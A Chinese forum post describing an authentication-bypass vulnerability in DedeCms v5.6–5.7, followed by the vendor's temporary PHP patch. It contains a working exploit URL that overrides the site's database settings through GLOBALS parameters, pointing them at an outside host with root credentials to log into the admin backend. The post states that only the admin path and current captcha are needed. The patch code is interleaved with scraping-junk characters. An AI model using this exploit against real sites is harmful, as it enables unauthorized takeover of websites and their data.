最近看过此主题的会员

返回列表 发帖
织梦(DedeCms) v5.6-5.7 越权访问漏洞
http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
% I' t- k9 q7 _6 A8 P2 F6 F% ?
把上面validate=dcug改为当前的验证码,即可直接进入网站后台

" G0 D8 y& W3 ~+ `  B2 R
此漏洞的前提是必须得到后台路径才能实现
5 g& @; a7 S# Z" E; }/ _4 y
官方临时解决办法:

7 Y6 c/ z! A( W
找到include/common.inc.php文件,把:
! U- z( \7 K9 A- c
    foreach($_REQUEST as $_k=>$_v)# l/ o9 G9 D: n  x
    {
' I0 l6 c3 L' k  X        var_dump($_k);
5 g5 k0 G8 M: m, I- U) ]' I        if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )! i/ M" f( b* }1 n0 S# r7 c( ~
        {  G; X! A3 f% e/ R0 p' Y
            exit('Request var not allow!');0 D' y+ O3 @1 [' m8 u( r
        }" u! d( t; z4 i, U0 l
    }

' [# g  o$ ^- e. [7 H. s' _
换成:

  P/ K( J$ h% h4 d
    //检查和注册外部提交的变量- [5 E8 i* X- u. c& L) u  H: o- u- Y" `
    function CheckRequest(&$val) {; T; V& }/ i" m2 ^; P
        if (is_array($val)) {2 b2 {, A' v7 L7 ]* i8 h0 U
            foreach ($val as $_k=>$_v) {* `/ h' [* w( b. V3 _& H; `/ s7 w
                CheckRequest($_k);
% i3 O+ }' y  U5 @  Q9 P- r                CheckRequest($val[$_k]);
8 z0 {6 c8 K/ `, W3 m, y( |" {6 Z            }7 O9 S  T/ [! ^7 |$ P
        } else
/ v9 W! D# T! G! ~        {
1 C1 ~9 Z+ J, q4 @; R            if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )' u* a* a# {* I
            {) w+ c: y# |) ^! ^
                exit('Request var not allow!');( R& k  F! w+ b5 o
            }
: ~9 n# r- v9 ~$ \8 w# u: o        }
0 [+ a' U! a2 B1 J    }8 p* e6 b& u7 E+ x, w" L
    CheckRequest($_REQUEST);# I2 H# d* l8 x% E

; f- K3 ^1 F9 m8 r, t. o
/ i+ N) P% ]1 V: h1 D- k5 B) K6 g
7 q2 x! r% ^9 n0 ]
9 M# b+ Q, r: u& V% T& |4 K7 m; @: f; H
& z( g, K+ j  M. u
; l( _8 Y. V6 m# j$ i* E7 o; [. [

. S/ c' }' P* L6 T! I4 P( C$ v0 Y* l3 L2 Y" o4 p

8 I$ F, G% k- d7 i% o7 Z( U
5 z/ V8 C3 p6 G" _
$ I  ?' O/ f3 A* {
8 ~% n+ R5 P. v9 w8 m9 K2 Q+ a) P# n( I  j

- ]2 ~, c9 T+ ~4 u# p- W4 D) d
0 o% g* r1 B+ i' ^* A* H. l- g* i8 O7 |7 F
. X) G% U' M$ ^8 D% e, x  L# ~

" _5 |5 W; z  i! N公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表